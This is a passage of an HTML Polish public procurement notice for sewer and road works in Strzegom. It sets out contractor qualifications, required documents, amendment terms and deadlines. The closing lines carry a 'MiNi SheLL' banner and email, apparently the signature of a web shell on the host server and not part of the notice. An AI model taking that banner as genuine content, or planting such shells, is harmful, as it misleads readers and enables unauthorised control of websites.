<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że dysponuje osobami  (nie dopuszcza się łączenia stanowisk) posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi w specjalnościach:

a) kierownik budowy posiadający uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci kanalizacyjnych z co najmniej 5-letnim stażem pracy od uzyskania uprawnień,

b) kierownik robót posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci kanalizacyjnych z co najmniej 3-letnim  stażem pracy od uzyskania uprawnień,

c) kierownik robót budowlanych posiadający  uprawnienia w specjalności drogowej   (konstrukcyjno-inżynieryjnej) do kierowania robotami budowlanymi w specjalności drogowej, z co najmniej  5 letnim stażem pracy od uzyskania uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że:
posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 1 000 000,00 zł

1. Zamawiający dokona oceny spełniania powyższych warunków na podstawie złożonych przez Wykonawcę dokumentów i oświadczeń na zasadzie spełnia warunek/nie spełnia warunku. 
Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać spełnienie przez Wykonawcę wymaganych warunków.
2. Dla potrzeb oceny spełnienia warunku dot. wiedzy i doświadczenia, w przypadku gdy wartości zostaną podane w walutach innych niż PLN,  Zamawiający przyjmie średni kurs PLN do tej waluty podawany przez NBP na dzień opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.            
3. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami      niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego warunki spełniają łącznie, natomiast każdy z wykonawców wspólnie ubiegających się o zamówienie zobowiązany jest wykazać brak podstaw do wykluczenia go z postępowania na podstawie 
art. 24 ust. 1 ustawy Pzp.

5. Wykonawcy wspólnie ubiegający się o zamówienie:
1)	ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,
2)	zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu 
i zawarcia umowy w sprawie zamówienia. Przyjmuje się, że pełnomocnictwo do
 podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność 
z  oryginałem wszystkich dokumentów,
3)	pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną; fakt ustanowienia Pełnomocnika musi wynikać z załączonych do oferty dokumentów, wszelka korespondencja prowadzona będzie z Pełnomocnikiem,
4)	jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający może przed zawarciem umowy wezwać pełnomocnika do przedstawienia umowy regulującej współpracę tych Wykonawców, 
5)	Wszelka korespondencja dokonywana będzie z Wykonawcą występującym jako reprezentant pozostałych (liderem),
6)	Oferta musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.

6. Przy składaniu oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy - może być złożona przez jednego z nich lub złożone dokumenty mogą potwierdzać łączne spełnienie warunku posiadania środków finansowych lub zdolności kredytowej w wysokości co najmniej 1 000 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wzór umowy, która zawarta będzie z Wykonawcą stanowi załącznik nr 5 do Specyfikacji Istotnych Warunków Zamówienia.
2. Zgodnie z postanowieniami art.144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy,  w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, obejmujących w szczególności: 

1)   aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę  adresu siedziby, zmianę formy prawnej itp.;
2) zmianę terminów realizacji zamówienia z przyczyn niezależnych od Wykonawcy lub          
Zamawiającego, które to przyczyny każda ze Stron musi udokumentować w tym m.in.: 
      - spowodowane nieprzewidzianymi w SIWZ nadzwyczajnymi warunkami jak: niewypały 
i niewybuchy, wykopaliska archeologiczne i inne przyczyny zewnętrzne skutkujące obiektywną niemożliwością prowadzenia prac lub wykonywania innych czynności;
      - spowodowane koniecznością usunięcia istotnych błędów lub wprowadzenia istotnych zmian 
w dokumentacji projektowej - nie ujawnionych przed podpisaniem umowy o udzielenie zamówienia publicznego,
      - spowodowane wystąpieniem robót zamiennych, uzupełniających lub dodatkowych, od wykonania których uzależnione jest wykonanie zamówienia podstawowego - jeżeli terminy ich zlecenia, rodzaj lub zakres, uniemożliwiają dotrzymanie pierwotnego terminu umownego,
      - będące następstwem wstrzymania robót przez uprawnione organy, z przyczyn nie wynikających 
z winy Wykonawcy lub będące następstwem działania organów administracji i innych podmiotów o kompetencjach zbliżonych do organów administracji, w szczególności eksploatatorów infrastruktury,
   pod  warunkiem akceptacji takiej zmiany przez instytucje współfinansujące zadania i pod  warunkiem, że zmiana taka nie spowoduje utraty ani zmniejszenia dofinansowania;

3)  zmianę umowy w przypadku zmiany przepisów prawa obowiązujących na dzień zawarcia umowy w  zakresie mającym wpływ na realizację umowy, w tym zamiany ustawowej stawki podatku od towarów i usług VAT, prowadzącej do zmiany kwoty brutto;
4) zmianę sposobu wykonania Umowy w razie, gdy jest niezbędna ze względów technicznych, technologicznych lub organizacyjnych, o ile zmiana taka jest korzystna dla Zamawiającego lub konieczna w celu prawidłowego wykonania Umowy, a brak zmiany sposobu wykonania umowy skutkowałby niewykonaniem lub wadliwym wykonaniem przedmiotu  umowy pod warunkiem, że Wykonawca lub Projektant zaoferuje rozwiązania techniczne, technologiczne lub organizacyjne 
o równoważnych lub lepszych parametrach;
5) zmianę umowy w zakresie kluczowego personelu Wykonawcy i Zmawiającego, za uprzednią zgodą Zamawiającego wyrażoną na piśmie, akceptującą   kandydata na kluczowe stanowisko kierownicze;
6) zmianę umowy w zakresie podwykonawstwa, za uprzednią zgodą Zamawiającego: możliwe jest powierzenie podwykonawcom innej części robót niż skazana w ofercie wykonawcy, 
a także możliwa zmiana podwykonawcy na etapie realizacji robót, jeżeli nowy podwykonawca wykaże spełnienie warunku zgodnie z jego opisem, a Wykonawca korzysta z wiedzy 
i doświadczenia podmiotów trzecich dla wskazania spełnienia tego warunku;
7) zmianę umowy w zakresie robót zamiennych i robót zaniechanych, jeżeli wystąpią okoliczności określone w paragrafie 2 ust. 2 i ust. 3 wzoru umowy;
8) zmianę sposobu dokonywania płatności na rzecz Wykonawcy lub sposób regulowania płatności wobec podwykonawców.

3. Warunki dokonywania zmian: 
     3.1  inicjowanie zmian na wniosek Wykonawcy lub Zamawiającego, 
     3.2  uzasadnienie zmiany prawidłową realizacją przedmiotu umowy,
     3.3  zmiany umowy, o których mowa powyżej  muszą być dokonywane z zachowaniem przepisu art. 140 ust. 3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U. z 2010 r. Nr 113, poz. 759 z późn. zm.) stanowiącego, że umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu zamówienia zawarte w SIWZ. 
     3.4  forma pisemna pod rygorem nieważności w formie aneksu do umowy.

4. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.strzegom.pl (pod ogłoszeniem)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, Rynek 38, 58-150 Strzegom, pok. 15 lub za zaliczeniem pocztowym. Cena specyfikacji 857,70 zł (plus koszty przesyłki).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2013 godzina 11:30, miejsce: Urząd Miejski, Rynek 38, 58-150 Strzegom - Wydział Obsługi Interesanta, parter - pok. 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.
IV.4.7) Uprawnionymi do kontaktowania się z Wykonawcami jest pani Monika Pawlik - tel. 74/ 8 560 533 oraz pani Leokadia Chmielewska - tel. - 74 8 560 551. 
IV.4.8) Zamawiający nie zamierza zawierać umowy ramowej. 
IV.4.9) Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com